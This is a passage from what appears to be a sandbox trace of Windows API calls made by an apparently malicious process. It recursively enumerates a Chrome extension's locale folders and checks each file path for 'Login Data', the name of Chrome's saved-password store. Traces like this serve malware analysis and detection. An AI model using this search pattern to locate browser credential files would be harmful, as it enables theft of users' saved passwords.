Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.561] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.561] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.561] lstrlenW (lpString="hu") returned 2 [0161.561] GetProcessHeap () returned 0x8e0000 [0161.561] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.561] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.561] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0161.561] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.561] GetProcessHeap () returned 0x8e0000 [0161.561] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.561] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned 137 [0161.561] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned 137 [0161.561] lstrlenW (lpString="\\*.*") returned 4 [0161.561] GetProcessHeap () returned 0x8e0000 [0161.561] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.561] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0161.561] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*" [0161.561] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.562] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.562] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.562] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.562] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.562] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.562] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned 137 [0161.562] lstrlenW (lpString="\\") returned 1 [0161.562] GetProcessHeap () returned 0x8e0000 [0161.562] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.562] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu" [0161.562] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\" [0161.562] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\") returned 138 [0161.562] lstrlenW (lpString="messages.json") returned 13 [0161.562] GetProcessHeap () returned 0x8e0000 [0161.562] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.562] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\" [0161.562] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json" [0161.562] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.562] GetProcessHeap () returned 0x8e0000 [0161.563] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.563] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\hu\\messages.json", lpSrch="Login Data") returned 0x0 [0161.563] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.563] GetProcessHeap () returned 0x8e0000 [0161.563] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.563] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.563] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.563] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.563] GetProcessHeap () returned 0x8e0000 [0161.563] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.563] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.563] GetProcessHeap () returned 0x8e0000 [0161.563] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.563] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="id", cAlternateFileName="")) returned 1 [0161.563] lstrcmpiW (lpString1="id", lpString2=".") returned 1 [0161.563] lstrcmpiW (lpString1="id", lpString2="..") returned 1 [0161.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 134 [0161.563] lstrlenW (lpString="\\") returned 1 [0161.563] GetProcessHeap () returned 0x8e0000 [0161.563] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales" [0161.563] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned 135 [0161.563] lstrlenW (lpString="id") returned 2 [0161.563] GetProcessHeap () returned 0x8e0000 [0161.563] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.563] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\" [0161.563] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\", lpString2="id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0161.563] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.563] GetProcessHeap () returned 0x8e0000 [0161.563] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.563] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned 137 [0161.564] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned 137 [0161.564] lstrlenW (lpString="\\*.*") returned 4 [0161.564] GetProcessHeap () returned 0x8e0000 [0161.564] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.564] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0161.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*" [0161.564] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.564] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.564] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1cb30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85a1cb30, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="..", cAlternateFileName="")) returned 1 [0161.564] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.564] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.564] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.564] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned 137 [0161.564] lstrlenW (lpString="\\") returned 1 [0161.564] GetProcessHeap () returned 0x8e0000 [0161.564] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.564] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id" [0161.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\" [0161.564] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\") returned 138 [0161.564] lstrlenW (lpString="messages.json") returned 13 [0161.564] GetProcessHeap () returned 0x8e0000 [0161.564] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.564] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\" [0161.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json" [0161.564] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.565] GetProcessHeap () returned 0x8e0000 [0161.565] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.565] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\id\\messages.json", lpSrch="Login Data") returned 0x0 [0161.565] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.565] GetProcessHeap () returned 0x8e0000 [0161.565] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.565] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x85a1cb30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x85a1ea70, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85cca3f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd0, dwReserved0=0x67006f, dwReserved1=0x6d006b, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.565] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.565] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.565] GetProcessHeap () returned 0x8e0000 